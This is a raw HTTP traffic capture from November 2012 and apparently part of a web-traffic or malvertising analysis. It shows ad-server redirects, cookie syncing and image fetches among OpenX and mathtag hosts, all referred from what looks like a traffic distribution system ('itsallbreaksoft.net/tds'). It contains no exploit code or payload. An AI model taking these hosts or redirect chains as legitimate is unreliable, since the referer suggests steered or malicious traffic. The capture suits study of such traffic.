HTTP/1.1 302 Moved Temporarily

HTTP/1.1 302 Moved Temporarily
Set-Cookie: i=29f7ae14-26b2-49c3-abf0-8aec74823bbe; Version=1; Expires=Sat, 16-Nov-2013 20:24:43 GMT; Max-Age=31536000; Domain=.openx.net; Path=/
Server: MochiWeb/1.1 WebMachine/1.9.0 (someone had painted it blue)
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Location: http://u.openx.net/w/1.0/sc?cc=1&amp;r=http%3A%2F%2Fox-social.bidsystem.com%2Fw%2F1.0%2Fafr%3Fcc%3D1%26auid%3D309047%26cb%3DINSERT_RANDOM_NUMBER_HERE
Date: Fri, 16 Nov 2012 20:24:43 GMT
Content-Length: 0
Connection: close
GET /w/1.0/sc?cc=1&r=http%3A%2F%2Fox-social.bidsystem.com%2Fw%2F1.0%2Fafr%3Fcc%3D1%26auid%3D309042%26cb%3DINSERT_RANDOM_NUMBER_HERE HTTP/1.1

Host: u.openx.net
GET /w/1.0/sc?cc=1&amp;r=http%3A%2F%2Fox-social.bidsystem.com%2Fw%2F1.0%2Fafr%3Fcc%3D1%26auid%3D309042%26cb%3DINSERT_RANDOM_NUMBER_HERE HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://itsallbreaksoft.net/tds/in.cgi?3&amp;seoref=&amp;parameter=$keyword&amp;se=$se&amp;ur=1&amp;HTTP_REFERER=http%3A%2F%2Fwww.meridiancrest.com%2Fgoogle-hot-trends-on-usa-election-day-2008%2F&amp;default_keyword=notdefine
Cookie: i=ac9eff7a-0018-4f1b-afe4-d88f6eaa63a3
HTTP/1.1 302 Moved Temporarily

HTTP/1.1 302 Moved Temporarily
Set-Cookie: i=ac9eff7a-0018-4f1b-afe4-d88f6eaa63a3; Version=1; Expires=Sat, 16-Nov-2013 20:24:43 GMT; Max-Age=31536000; Domain=.openx.net; Path=/
Server: MochiWeb/1.1 WebMachine/1.9.0 (someone had painted it blue)
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Location: http://ox-social.bidsystem.com/w/1.0/afr?mi=ac9eff7a-0018-4f1b-afe4-d88f6eaa63a3&amp;mn=1&amp;mc=1&amp;cc=1&amp;auid=309042&amp;cb=INSERT_RANDOM_NUMBER_HERE
Date: Fri, 16 Nov 2012 20:24:43 GMT
Content-Length: 0
Connection: close
GET /w/1.0/sc?cc=1&r=http%3A%2F%2Fox-social.bidsystem.com%2Fw%2F1.0%2Fafr%3Fcc%3D1%26auid%3D309047%26cb%3DINSERT_RANDOM_NUMBER_HERE HTTP/1.1

Host: u.openx.net
GET /w/1.0/sc?cc=1&amp;r=http%3A%2F%2Fox-social.bidsystem.com%2Fw%2F1.0%2Fafr%3Fcc%3D1%26auid%3D309047%26cb%3DINSERT_RANDOM_NUMBER_HERE HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://itsallbreaksoft.net/tds/in.cgi?3&amp;seoref=&amp;parameter=$keyword&amp;se=$se&amp;ur=1&amp;HTTP_REFERER=http%3A%2F%2Fwww.meridiancrest.com%2Fgoogle-hot-trends-on-usa-election-day-2008%2F&amp;default_keyword=notdefine
Cookie: i=29f7ae14-26b2-49c3-abf0-8aec74823bbe
HTTP/1.1 302 Moved Temporarily

HTTP/1.1 302 Moved Temporarily
Set-Cookie: i=29f7ae14-26b2-49c3-abf0-8aec74823bbe; Version=1; Expires=Sat, 16-Nov-2013 20:24:44 GMT; Max-Age=31536000; Domain=.openx.net; Path=/
Server: MochiWeb/1.1 WebMachine/1.9.0 (someone had painted it blue)
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Location: http://ox-social.bidsystem.com/w/1.0/afr?mi=29f7ae14-26b2-49c3-abf0-8aec74823bbe&amp;mn=1&amp;mc=1&amp;cc=1&amp;auid=309047&amp;cb=INSERT_RANDOM_NUMBER_HERE
Date: Fri, 16 Nov 2012 20:24:44 GMT
Content-Length: 0
Connection: close
GET /w/1.0/afr?cc=1&auid=309041 HTTP/1.1

Host: ox-social.bidsystem.com
GET /w/1.0/afr?cc=1&amp;auid=309041 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://itsallbreaksoft.net/tds/in.cgi?3&amp;seoref=&amp;parameter=$keyword&amp;se=$se&amp;ur=1&amp;HTTP_REFERER=http%3A%2F%2Fwww.meridiancrest.com%2Fgoogle-hot-trends-on-usa-election-day-2008%2F&amp;default_keyword=notdefine
Cookie: OX_u=a8a10a64-532b-029f-0620-cbca49c32c1a_a_1353097482
HTTP/1.1 302 Moved Temporarily

HTTP/1.1 302 Moved Temporarily
Set-Cookie: OX_u=a8a10a64-532b-029f-0620-cbca49c32c1a_a_1354307083; Version=1; Expires=Sat, 16-Nov-2013 20:24:43 GMT; Max-Age=31536000; Path=/
Server: MochiWeb/1.1 WebMachine/1.9.0 (someone had painted it blue)
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Location: http://u.openx.net/w/1.0/sc?r=http%3A%2F%2Fox-social.bidsystem.com%2Fw%2F1.0%2Fafr%3Fcc%3D1%26auid%3D309041
Date: Fri, 16 Nov 2012 20:24:43 GMT
Content-Length: 0
Connection: close
GET /w/1.0/afr?cc=1&auid=309045 HTTP/1.1

Host: ox-social.bidsystem.com
GET /w/1.0/afr?cc=1&amp;auid=309045 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://itsallbreaksoft.net/tds/in.cgi?3&amp;seoref=&amp;parameter=$keyword&amp;se=$se&amp;ur=1&amp;HTTP_REFERER=http%3A%2F%2Fwww.meridiancrest.com%2Fgoogle-hot-trends-on-usa-election-day-2008%2F&amp;default_keyword=notdefine
Cookie: OX_u=b45c1f3f-242d-0f2a-27d9-17bf675392e6_a_1353097482
HTTP/1.1 302 Moved Temporarily

HTTP/1.1 302 Moved Temporarily
Set-Cookie: OX_u=b45c1f3f-242d-0f2a-27d9-17bf675392e6_a_1354307083; Version=1; Expires=Sat, 16-Nov-2013 20:24:43 GMT; Max-Age=31536000; Path=/
Server: MochiWeb/1.1 WebMachine/1.9.0 (someone had painted it blue)
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Location: http://u.openx.net/w/1.0/sc?r=http%3A%2F%2Fox-social.bidsystem.com%2Fw%2F1.0%2Fafr%3Fcc%3D1%26auid%3D309045
Date: Fri, 16 Nov 2012 20:24:43 GMT
Content-Length: 0
Connection: close
GET /w/1.0/sc?r=http%3A%2F%2Fox-social.bidsystem.com%2Fw%2F1.0%2Fafr%3Fcc%3D1%26auid%3D309041 HTTP/1.1

Host: u.openx.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://itsallbreaksoft.net/tds/in.cgi?3&amp;seoref=&amp;parameter=$keyword&amp;se=$se&amp;ur=1&amp;HTTP_REFERER=http%3A%2F%2Fwww.meridiancrest.com%2Fgoogle-hot-trends-on-usa-election-day-2008%2F&amp;default_keyword=notdefine
Cookie: i=29f7ae14-26b2-49c3-abf0-8aec74823bbe
HTTP/1.1 302 Moved Temporarily

HTTP/1.1 302 Moved Temporarily
Set-Cookie: i=29f7ae14-26b2-49c3-abf0-8aec74823bbe; Version=1; Expires=Sat, 16-Nov-2013 20:24:44 GMT; Max-Age=31536000; Domain=.openx.net; Path=/
Server: MochiWeb/1.1 WebMachine/1.9.0 (someone had painted it blue)
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Location: http://ox-social.bidsystem.com/w/1.0/afr?mi=29f7ae14-26b2-49c3-abf0-8aec74823bbe&amp;mn=0&amp;mc=1&amp;cc=1&amp;auid=309041
Date: Fri, 16 Nov 2012 20:24:44 GMT
Content-Length: 0
Connection: close
GET /w/1.0/sc?r=http%3A%2F%2Fox-social.bidsystem.com%2Fw%2F1.0%2Fafr%3Fcc%3D1%26auid%3D309045 HTTP/1.1

Host: u.openx.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://itsallbreaksoft.net/tds/in.cgi?3&amp;seoref=&amp;parameter=$keyword&amp;se=$se&amp;ur=1&amp;HTTP_REFERER=http%3A%2F%2Fwww.meridiancrest.com%2Fgoogle-hot-trends-on-usa-election-day-2008%2F&amp;default_keyword=notdefine
Cookie: i=29f7ae14-26b2-49c3-abf0-8aec74823bbe
HTTP/1.1 302 Moved Temporarily

HTTP/1.1 302 Moved Temporarily
Set-Cookie: i=29f7ae14-26b2-49c3-abf0-8aec74823bbe; Version=1; Expires=Sat, 16-Nov-2013 20:24:44 GMT; Max-Age=31536000; Domain=.openx.net; Path=/
Server: MochiWeb/1.1 WebMachine/1.9.0 (someone had painted it blue)
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Location: http://ox-social.bidsystem.com/w/1.0/afr?mi=29f7ae14-26b2-49c3-abf0-8aec74823bbe&amp;mn=0&amp;mc=1&amp;cc=1&amp;auid=309045
Date: Fri, 16 Nov 2012 20:24:44 GMT
Content-Length: 0
Connection: close
GET /a97/a97ba73a-af44-466a-86ba-8c74a601bd81/617/617ec31c34b2a02859ab8261647ff41c.jpg HTTP/1.1

Host: ox-socialimg.bidsystem.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ox-social.bidsystem.com/w/1.0/afr?mi=29f7ae14-26b2-49c3-abf0-8aec74823bbe&amp;mn=1&amp;mc=1&amp;cc=1&amp;auid=309047&amp;cb=INSERT_RANDOM_NUMBER_HERE
HTTP/1.1 200 OK

Content-Type: image/jpeg
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 25 Oct 2012 22:10:52 GMT
Etag: &quot;6b1f3b-bd1b-4cce979ef1300&quot;
Accept-Ranges: bytes
Content-Length: 48411
X-Pad: avoid browser bug
Date: Fri, 16 Nov 2012 20:24:44 GMT
Connection: keep-alive
GET /w/1.0/afr?mi=29f7ae14-26b2-49c3-abf0-8aec74823bbe&mn=0&mc=1&cc=1&auid=309045 HTTP/1.1

Host: ox-social.bidsystem.com
GET /w/1.0/afr?mi=29f7ae14-26b2-49c3-abf0-8aec74823bbe&amp;mn=0&amp;mc=1&amp;cc=1&amp;auid=309045 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://itsallbreaksoft.net/tds/in.cgi?3&amp;seoref=&amp;parameter=$keyword&amp;se=$se&amp;ur=1&amp;HTTP_REFERER=http%3A%2F%2Fwww.meridiancrest.com%2Fgoogle-hot-trends-on-usa-election-day-2008%2F&amp;default_keyword=notdefine
Cookie: OX_u=b45c1f3f-242d-0f2a-27d9-17bf675392e6_a_1354307083
HTTP/1.1 200 OK

Content-Type: text/html
Set-Cookie: OX_u=808c092e-89f6-0fa9-2d4a-0698d283863f_m_1354307083; Version=1; Expires=Sat, 16-Nov-2013 20:24:44 GMT; Max-Age=31536000; Path=/
Server: MochiWeb/1.1 WebMachine/1.9.0 (someone had painted it blue)
Pragma: no-cache
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Date: Fri, 16 Nov 2012 20:24:44 GMT
Content-Length: 1906
Cache-Control: private, max-age=0, no-cache
Connection: close
GET /a97/a97ba73a-af44-466a-86ba-8c74a601bd81/fdb/fdb3faf7fc25bdf913b0ec1659344244.jpg HTTP/1.1

Host: ox-socialimg.bidsystem.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ox-social.bidsystem.com/w/1.0/afr?mi=29f7ae14-26b2-49c3-abf0-8aec74823bbe&amp;mn=0&amp;mc=1&amp;cc=1&amp;auid=309045
HTTP/1.1 200 OK

Content-Type: image/jpeg
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 28 Sep 2012 18:14:22 GMT
Etag: &quot;69b9d1-bc9c-4cac7066dbb80&quot;
Accept-Ranges: bytes
Content-Length: 48284
X-Pad: avoid browser bug
Date: Fri, 16 Nov 2012 20:24:44 GMT
Connection: keep-alive
GET /w/1.0/afr?mi=29f7ae14-26b2-49c3-abf0-8aec74823bbe&mn=1&mc=1&cc=1&auid=309047&cb=INSERT_RANDOM_NUMBER_HERE HTTP/1.1

Host: ox-social.bidsystem.com
GET /w/1.0/afr?mi=29f7ae14-26b2-49c3-abf0-8aec74823bbe&amp;mn=1&amp;mc=1&amp;cc=1&amp;auid=309047&amp;cb=INSERT_RANDOM_NUMBER_HERE HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://itsallbreaksoft.net/tds/in.cgi?3&amp;seoref=&amp;parameter=$keyword&amp;se=$se&amp;ur=1&amp;HTTP_REFERER=http%3A%2F%2Fwww.meridiancrest.com%2Fgoogle-hot-trends-on-usa-election-day-2008%2F&amp;default_keyword=notdefine
Cookie: OX_u=c5562cb3-ae1d-0f25-10ac-10aa7e583028_a_1354307083
HTTP/1.1 200 OK

Content-Type: text/html
Set-Cookie: OX_u=808c092e-89f6-0fa9-2d4a-0698d283863f_m_1354307083; Version=1; Expires=Sat, 16-Nov-2013 20:24:44 GMT; Max-Age=31536000; Path=/
Server: MochiWeb/1.1 WebMachine/1.9.0 (someone had painted it blue)
Pragma: no-cache
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Date: Fri, 16 Nov 2012 20:24:44 GMT
Content-Length: 6823
Cache-Control: private, max-age=0, no-cache
Connection: close
GET /w/1.0/afr?mi=ac9eff7a-0018-4f1b-afe4-d88f6eaa63a3&mn=1&mc=1&cc=1&auid=309042&cb=INSERT_RANDOM_NUMBER_HERE HTTP/1.1

Host: ox-social.bidsystem.com
GET /w/1.0/afr?mi=ac9eff7a-0018-4f1b-afe4-d88f6eaa63a3&amp;mn=1&amp;mc=1&amp;cc=1&amp;auid=309042&amp;cb=INSERT_RANDOM_NUMBER_HERE HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://itsallbreaksoft.net/tds/in.cgi?3&amp;seoref=&amp;parameter=$keyword&amp;se=$se&amp;ur=1&amp;HTTP_REFERER=http%3A%2F%2Fwww.meridiancrest.com%2Fgoogle-hot-trends-on-usa-election-day-2008%2F&amp;default_keyword=notdefine
Cookie: OX_u=c5562cb3-ae1d-0f25-10ac-10aa7e583028_a_1354307083
HTTP/1.1 200 OK

Content-Type: text/html
Set-Cookie: OX_u=05e55840-af5c-0971-295e-54fbc8abde22_m_1354307083; Version=1; Expires=Sat, 16-Nov-2013 20:24:44 GMT; Max-Age=31536000; Path=/
Server: MochiWeb/1.1 WebMachine/1.9.0 (someone had painted it blue)
Pragma: no-cache
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Date: Fri, 16 Nov 2012 20:24:44 GMT
Content-Length: 6823
Cache-Control: private, max-age=0, no-cache
Connection: close
GET /w/1.0/afr?mi=29f7ae14-26b2-49c3-abf0-8aec74823bbe&mn=0&mc=1&cc=1&auid=309041 HTTP/1.1

Host: ox-social.bidsystem.com
GET /w/1.0/afr?mi=29f7ae14-26b2-49c3-abf0-8aec74823bbe&amp;mn=0&amp;mc=1&amp;cc=1&amp;auid=309041 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://itsallbreaksoft.net/tds/in.cgi?3&amp;seoref=&amp;parameter=$keyword&amp;se=$se&amp;ur=1&amp;HTTP_REFERER=http%3A%2F%2Fwww.meridiancrest.com%2Fgoogle-hot-trends-on-usa-election-day-2008%2F&amp;default_keyword=notdefine
Cookie: OX_u=b45c1f3f-242d-0f2a-27d9-17bf675392e6_a_1354307083
HTTP/1.1 200 OK

Content-Type: text/html
Set-Cookie: OX_u=808c092e-89f6-0fa9-2d4a-0698d283863f_m_1354307083; Version=1; Expires=Sat, 16-Nov-2013 20:24:44 GMT; Max-Age=31536000; Path=/
Server: MochiWeb/1.1 WebMachine/1.9.0 (someone had painted it blue)
Pragma: no-cache
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Date: Fri, 16 Nov 2012 20:24:44 GMT
Content-Length: 1910
Cache-Control: private, max-age=0, no-cache
Connection: close
GET /w/1.0/pd?plm=2 HTTP/1.1

Host: ox-social.bidsystem.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ox-social.bidsystem.com/w/1.0/afr?mi=29f7ae14-26b2-49c3-abf0-8aec74823bbe&amp;mn=0&amp;mc=1&amp;cc=1&amp;auid=309045
Cookie: OX_u=808c092e-89f6-0fa9-2d4a-0698d283863f_m_1354307083
HTTP/1.1 200 OK

Content-Type: text/html
Set-Cookie: OX_pd=5d4efa24-af6b-11e1-8f8e-842b2b080a35.1353097484|7182ac20-af6b-11e1-8f8e-842b2b080a35.1353097484; Version=1; Expires=Sat, 01-Dec-2012 20:24:44 GMT; Max-Age=1296000; Path=/
Server: MochiWeb/1.1 WebMachine/1.9.0 (someone had painted it blue)
Date: Fri, 16 Nov 2012 20:24:44 GMT
Content-Length: 333
Connection: close
GET /w/1.0/ri?ts=1fHNpZD02NDEyNnxhdWlkPTMwOTA0NXxsdz0xNDQxfGFpZD02MjE5Mzh8cHViPTY3ODU0fGxpZD0zNTg1ODZ8dD0xfHJpZD02MzIwNTAwMi0zNjA1LTQyNzUtYjIzMC1lNmJlOWVkMWM5MTl8b2lkPTc1OTAwfGJtPUJVWUlORy5OT05HVUFSQU5URUVEfHBjPVVTRHxwPTExNTAwMDB8YWM9VVNEfHBtPVBSSUNJTkcuQ1BBfGxjPTJ8cnQ9MTM1MzA5NzQ4NHxwcj0xMTUwMDAwfGFkdj02Mjk3Nw&cb=234001 HTTP/1.1

Host: ox-social.bidsystem.com
GET /w/1.0/ri?ts=1fHNpZD02NDEyNnxhdWlkPTMwOTA0NXxsdz0xNDQxfGFpZD02MjE5Mzh8cHViPTY3ODU0fGxpZD0zNTg1ODZ8dD0xfHJpZD02MzIwNTAwMi0zNjA1LTQyNzUtYjIzMC1lNmJlOWVkMWM5MTl8b2lkPTc1OTAwfGJtPUJVWUlORy5OT05HVUFSQU5URUVEfHBjPVVTRHxwPTExNTAwMDB8YWM9VVNEfHBtPVBSSUNJTkcuQ1BBfGxjPTJ8cnQ9MTM1MzA5NzQ4NHxwcj0xMTUwMDAwfGFkdj02Mjk3Nw&amp;cb=234001 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ox-social.bidsystem.com/w/1.0/afr?mi=29f7ae14-26b2-49c3-abf0-8aec74823bbe&amp;mn=0&amp;mc=1&amp;cc=1&amp;auid=309045
Cookie: OX_u=808c092e-89f6-0fa9-2d4a-0698d283863f_m_1354307083
HTTP/1.1 200 OK

Content-Type: image/gif
Server: MochiWeb/1.1 WebMachine/1.9.0 (someone had painted it blue)
Pragma: no-cache
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Date: Fri, 16 Nov 2012 20:24:44 GMT
Content-Length: 43
Cache-Control: private, max-age=0, no-cache
Connection: close
GET /w/1.0/ri?ts=1fHNpZD02NDEyNnxhdWlkPTMwOTA0MXxsdz0xNDQxfGFpZD02MjE5Mzh8cHViPTY3ODU0fGxpZD0zNTg1ODZ8dD0xfHJpZD1jNzgwYmE4Yy1lYzc1LTQyNzUtOTFhYS1lNTFjMWE4Nzc2Y2R8b2lkPTc1OTAwfGJtPUJVWUlORy5OT05HVUFSQU5URUVEfHBjPVVTRHxwPTExNTAwMDB8YWM9VVNEfHBtPVBSSUNJTkcuQ1BBfGxjPTJ8cnQ9MTM1MzA5NzQ4NHxwcj0xMTUwMDAwfGFkdj02Mjk3Nw&cb=66859514 HTTP/1.1

Host: ox-social.bidsystem.com
GET /w/1.0/ri?ts=1fHNpZD02NDEyNnxhdWlkPTMwOTA0MXxsdz0xNDQxfGFpZD02MjE5Mzh8cHViPTY3ODU0fGxpZD0zNTg1ODZ8dD0xfHJpZD1jNzgwYmE4Yy1lYzc1LTQyNzUtOTFhYS1lNTFjMWE4Nzc2Y2R8b2lkPTc1OTAwfGJtPUJVWUlORy5OT05HVUFSQU5URUVEfHBjPVVTRHxwPTExNTAwMDB8YWM9VVNEfHBtPVBSSUNJTkcuQ1BBfGxjPTJ8cnQ9MTM1MzA5NzQ4NHxwcj0xMTUwMDAwfGFkdj02Mjk3Nw&amp;cb=66859514 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ox-social.bidsystem.com/w/1.0/afr?mi=29f7ae14-26b2-49c3-abf0-8aec74823bbe&amp;mn=0&amp;mc=1&amp;cc=1&amp;auid=309041
Cookie: OX_u=808c092e-89f6-0fa9-2d4a-0698d283863f_m_1354307083
HTTP/1.1 200 OK

Content-Type: image/gif
Server: MochiWeb/1.1 WebMachine/1.9.0 (someone had painted it blue)
Pragma: no-cache
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Date: Fri, 16 Nov 2012 20:24:44 GMT
Content-Length: 43
Cache-Control: private, max-age=0, no-cache
Connection: close
GET /sync/img?mt_exid=5&redir=http%3A%2F%2Fr.openx.net%2Fset%3Fpid%3D0b83a084-dd0b-4bfe-9e2e-ab3706fc9955%26rtb%3Duuid%253D%5BMM_UUID%5D HTTP/1.1

Host: sync.mathtag.com
GET /sync/img?mt_exid=5&amp;redir=http%3A%2F%2Fr.openx.net%2Fset%3Fpid%3D0b83a084-dd0b-4bfe-9e2e-ab3706fc9955%26rtb%3Duuid%253D%5BMM_UUID%5D HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ox-social.bidsystem.com/w/1.0/pd?plm=2
HTTP/1.1 302 Found

Content-Type: image/gif
Date: Fri, 16 Nov 2012 20:24:45 GMT
Content-Length: 0
Connection: keep-alive
Server: mt2/2.6.2.2465 Sep 24 2012 22:21:34 zrh-pixel-x5 pid 0x1087 4231
Cache-Control: no-cache
P3P: CP=&quot;NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA&quot;
Set-Cookie: uuid=50a6a10d-3cec-2511-51c1-49fbbef97cf4; domain=.mathtag.com; path=/; expires=Sat, 16-Nov-2013 20:24:45 GMT
Location: http://sync.mathtag.com/sync/img?mt_exid=5&amp;redir=http%3A%2F%2Fr.openx.net%2Fset%3Fpid%3D0b83a084-dd0b-4bfe-9e2e-ab3706fc9955%26rtb%3Duuid%253D%5BMM_UUID%5D&amp;mm_bnc
GET /sync/img?mt_exid=5&redir=http%3A%2F%2Fr.openx.net%2Fset%3Fpid%3D0b83a084-dd0b-4bfe-9e2e-ab3706fc9955%26rtb%3Duuid%253D%5BMM_UUID%5D&mm_bnc HTTP/1.1

Host: sync.mathtag.com
GET /sync/img?mt_exid=5&amp;redir=http%3A%2F%2Fr.openx.net%2Fset%3Fpid%3D0b83a084-dd0b-4bfe-9e2e-ab3706fc9955%26rtb%3Duuid%253D%5BMM_UUID%5D&amp;mm_bnc HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ox-social.bidsystem.com/w/1.0/pd?plm=2
Cookie: uuid=50a6a10d-3cec-2511-51c1-49fbbef97cf4
HTTP/1.1 302 Found

Content-Type: image/gif
Date: Fri, 16 Nov 2012 20:24:45 GMT
Content-Length: 0
Connection: keep-alive
Server: mt2/2.6.2.2465 Sep 24 2012 22:21:34 zrh-pixel-x5 pid 0x1083 4227
Cache-Control: no-cache
P3P: CP=&quot;NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA&quot;
Set-Cookie: mt_mop=5:1353097485; domain=.mathtag.com; path=/; expires=Sun, 16-Dec-2012 20:24:45 GMT
Location: http://r.openx.net/set?pid=0b83a084-dd0b-4bfe-9e2e-ab3706fc9955&amp;rtb=uuid%3D50a6a10d-3cec-2511-51c1-49fbbef97cf4
